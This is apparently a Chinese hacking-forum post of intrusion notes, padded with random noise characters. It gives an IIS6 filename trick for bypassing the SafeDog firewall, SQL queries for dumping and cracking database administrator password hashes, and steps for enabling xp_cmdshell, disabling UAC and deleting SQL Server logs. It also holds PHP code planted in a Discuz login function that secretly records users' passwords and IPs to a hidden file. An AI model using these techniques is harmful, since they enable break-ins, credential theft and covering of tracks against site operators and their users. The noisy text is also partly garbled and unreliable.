8 T" `2 |% E& P7 E) E" D在它下面直接插入即可,记录的密码生成在pwd.txt中,) e9 k2 s& M, y8 ~% g, \) F
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录) D3 g8 h' h. o Q3 V7 i
利用II6文件解析漏洞绕过安全狗代码:
) S7 t6 e0 M/ k;antian365.asp;antian365.jpg
: {. F% }! ~7 _: W* f' x, K; `8 Q2 u2 Y# M- b# s4 \
各种类型数据库抓HASH破解最高权限密码!
: ?" V- O, q; ~; q. u. f, e1.sql server2000
+ n4 i: ~% g5 H+ u8 w5 BSELECT password from master.dbo.sysxlogins where name='sa'7 R6 K7 }5 `+ b
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
! Y& n; Z. D' d! L9 l% @2FD54D6119FFF04129A1D72E7C3194F7284A7F3A: w1 p" ~ T3 ~- [; u
# {( M3 O m! b& \0×0100- constant header" f$ x; ^8 D* N6 p
34767D5C- salt
( D: o f& c/ N: g5 M9 t0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash. ], ^2 j' O+ m6 z
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
( z+ [- R) Y* w3 Bcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash8 g( y& Z. x7 c+ e
SQL server 2005:-: l5 n5 G; n" @7 `* ]
SELECT password_hash FROM sys.sql_logins where name='sa'
+ e# H0 ^$ Y" o- K n0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F/ ]3 n* y2 k' i" p9 C
0×0100- constant header
1 B- T7 y% i' ^/ V& r993BF231-salt* D* Y: \% E3 d; n# X- {3 a
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash% H' _3 `4 P; k+ a. [! Z7 |1 u s
crack case sensitive hash in cain, try brute force and dictionary based attacks.7 L# {1 l# t+ I; `
0 l7 L; J8 h; u0 aupdate:- following bernardo’s comments:-8 Y' l4 |$ o( `9 u8 L
use function fn_varbintohexstr() to cast password in a hex string.
; L' O" m0 t5 `( ?& f. Xe.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
, z! @3 @/ f; {5 {8 v. m4 X) r0 [; M9 I( Z
MYSQL:-
; X8 I( c, `, k/ F6 z6 }$ F f2 I4 U5 E* N3 v) T) J; l+ E
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.( J; g2 R. q4 A9 s8 Y/ O
- b- N% f: k. {0 ? {4 [
*mysql < 4.1
5 \& P. _: E6 k* z* q( ]4 V/ P& R
mysql> SELECT PASSWORD(‘mypass’);# W) e# }; y. I+ o
+——————–+0 H; l( T4 i0 m; A6 _! B4 b' g6 f: ?+ r
| PASSWORD(‘mypass’) |
6 A- U/ H" p* X5 p5 m: d N( s+——————–+6 D' C# L6 U( b6 F- k
| 6f8c114b58f2ce9e |9 P6 A, m4 z0 H: p% i
+——————–+ f5 h; V" h: H: q
3 P( Q+ m5 ~/ P6 \8 _
*mysql >=4.1
3 H- S U6 H# |+ }* V! d
* d8 c( A* A3 Q% r3 W7 \: U6 w7 Vmysql> SELECT PASSWORD(‘mypass’);/ k v6 A& x- h+ q
+——————————————-+' `0 a' Q& W- J% v3 t9 W
| PASSWORD(‘mypass’) |
8 C5 z( ]/ f; H- ~- D( G" x* K7 [& t+——————————————-+' o* A4 D, F* T A
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
3 X' {- A; I8 J \' _4 k+——————————————-+
3 B( V4 Z" |* {, i1 x3 B7 W" J6 s0 ?6 s8 j- r* ^* p" M
Select user, password from mysql.user7 i, k- }8 i! l; z0 m/ `9 n
The hashes can be cracked in ‘cain and abel’* @- \1 `/ `+ o; a. F. [
0 i; z& j2 e: C- ^- N/ X. d1 G7 wPostgres:-- M* I4 W& G! T M* T: }# s$ Z, C
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
7 c- w- p7 u# [select usename, passwd from pg_shadow;
: I+ ?. {- m0 ^# T8 vusename | passwd
# P' w# A/ J4 ^* h& ?! i——————+————————————-2 G; V- {4 ]5 W; g5 ^! V
testuser | md5fabb6d7172aadfda4753bf0507ed4396
; E0 C4 w! x* T% l. t0 L* \use mdcrack to crack these hashes:-; }# l8 t' l) {& C9 i( ^
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
& V) i+ \* U& L3 [( |8 L
6 U2 P' e/ C5 t# z* H4 j# M. rOracle:-
! H& ]3 d- s+ k5 cselect name, password, spare4 from sys.user$
6 \/ @# ^, h) [2 ]. }hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g- H5 ~. T" B& O! B+ n4 P0 S
More on Oracle later, i am a bit bored….% _* m: f# d8 b8 B' g
. @4 O/ Q5 p7 u$ d# D/ N" e
7 A' V: Z! U. j4 i; v$ T. J
在sql server2005/2008中开启xp_cmdshell# P6 e) y. K# z; t
-- To allow advanced options to be changed.* \5 f! e+ N" _
EXEC sp_configure 'show advanced options', 1( s2 b+ v. _* u2 e$ g2 `
GO6 g3 n# G+ i& f' x) `
-- To update the currently configured value for advanced options.3 s1 }9 w2 G: [2 I% m, }) B
RECONFIGURE- F' ~8 u& }5 H& F4 E
GO* e! n" z4 X+ \$ ~% u
-- To enable the feature.0 n+ G! u5 Q% f S) k/ y( v3 w
EXEC sp_configure 'xp_cmdshell', 14 }$ h" g- y& }2 ~% Z7 X3 p n
GO& n/ q" _6 Z% Y, B2 J( V
-- To update the currently configured value for this feature.
+ H6 V. Y0 j2 B/ PRECONFIGURE
W! o" s8 d1 M6 L# X5 PGO4 P% m- r8 y! l% s
SQL 2008 server日志清除,在清楚前一定要备份。2 o$ x% Z. G* G+ e/ p
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
]/ k, `3 @3 _. D& p D- OX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
0 t5 m. H- A" _$ P
3 K) [/ R* N7 N# i1 p- R7 N: V对于SQL Server 2008以前的版本:
( z: a/ o7 t7 h5 k' BSQL Server 2005:
, L1 j' k g+ z, P Y/ F# w删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
7 P0 v; D. K) f z; |, Y) T8 @SQL Server 2000:
, c& O7 x( r) y/ ~9 _ W* Q+ a* U清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
3 w6 z5 b# }$ r' K1 ]2 u [. a! I- F$ {/ q" f6 k5 p
本帖最后由 simeon 于 2013-1-3 09:51 编辑& N5 B& s6 _) x9 g! z4 K
" N+ k1 I& H- Y' I9 l* I( f Z4 |# b$ i
. h) X. S% h H& Jwindows 2008 文件权限修改, b: K' T" P' F' a
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx: {5 W% ~) I& |/ J3 j
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad987 s7 d# I3 Y/ u5 R2 |( R% U* H* w( |
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
7 d) \. A/ r6 y' n
3 k; h, b. c1 d/ i/ ^Windows Registry Editor Version 5.00
* o' w. a4 n! o0 h+ ?' C[HKEY_CLASSES_ROOT\*\shell\runas]
6 L5 g* A) E+ C7 H5 k" O@="管理员取得所有权"6 k1 V5 u/ {9 k) b
"NoWorkingDirectory"="": y' V; y* Q, L( p9 r1 y9 X9 ^
[HKEY_CLASSES_ROOT\*\shell\runas\command]& p$ b, _6 T9 z
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
0 F+ |+ s( ]/ v; F! s5 p3 K"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"" A+ U2 _" h1 {5 l/ d; E$ y% B- H
[HKEY_CLASSES_ROOT\exefile\shell\runas2]; d6 q* q! J) ~" g
@="管理员取得所有权"' I; u( m' o* D0 Y9 ^# n: h" E- r
"NoWorkingDirectory"=""
1 B# a2 f6 A4 t0 e' i[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
! ~$ _; v" p! ~+ j@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"1 I/ i$ }! l* w
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
4 F1 `# z/ N8 `; E ?0 r$ C" W" I$ g: M- D( N1 D
[HKEY_CLASSES_ROOT\Directory\shell\runas]
# F, N/ V g! x: a6 [@="管理员取得所有权"
6 w& U- R6 S6 _& f+ t"NoWorkingDirectory"=""( I% b! u6 ]$ I: d. p( |4 D6 h6 _" ?
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]% x% f& c E: P- F( X% y R+ d6 u
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"* }. l/ |8 l8 ^ Q+ F0 Z7 G1 |) u
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
0 Q" J }8 ? B0 w* V
& q5 g. N1 w0 N: Y8 E1 f1 I2 k3 b% \
win7右键“管理员取得所有权”.reg导入
' _; w* i$ t! \4 _- W! v1 Y二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
. r9 V h1 @8 [$ v$ v1、C:\Windows这个路径的“notepad.exe”不需要替换# V6 Z8 C5 Z) M" L3 `' y# {
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换: M# ]1 L2 I, i
3、四个“notepad.exe.mui”不要管
2 R n7 x- u% g9 {: B2 [4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和0 c0 a" M8 H& k/ p6 X9 |1 D
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”- O+ W- w% `4 D9 p. ~2 y) N
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,$ Q( N$ G1 \7 B) N/ q& O- M& X
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。6 m. y( R4 K4 l: B7 i, x8 }8 K
windows 2008中关闭安全策略: 3 l+ ^- j( ]: S. w* E: g" ^
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$ J) s( L2 l/ s+ p8 E0 v% k& g
修改uc_client目录下的client.php 在& I% J: H5 l. D( Z, R7 B, ~- r, y
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
8 g L. M3 L- v0 d7 D下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
3 ?% U2 k# J" H0 _! O! l& P l9 {你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw6 Q4 Y# R3 O( y/ Q+ c' U" b
if(getenv('HTTP_CLIENT_IP')) {
: i0 d9 x( Z2 w! {/ m3 \" u6 Q$onlineip = getenv('HTTP_CLIENT_IP');3 T+ }0 Z/ F: T: J
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
* r# w0 ?) M' n$onlineip = getenv('HTTP_X_FORWARDED_FOR');7 m8 A+ h; C; O, P3 j- y( E
} elseif(getenv('REMOTE_ADDR')) {
S% ~- h" }( `7 f1 D9 e7 Q$onlineip = getenv('REMOTE_ADDR');
4 V' ?, K4 }; a! ?/ r& y* ]} else {% i8 z3 ~9 v9 `# y
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
7 Z+ _( @$ _- l9 R) P- _}* y# A0 {$ L* n3 t% q& a; {# `1 A
$showtime=date("Y-m-d H:i:s");
% ~; u; B! ^, `" {; _' ? $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
8 K& s2 ]2 p9 N $handle=fopen('./data/cache/csslog.php','a+');9 R) O' ]1 l+ Z
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对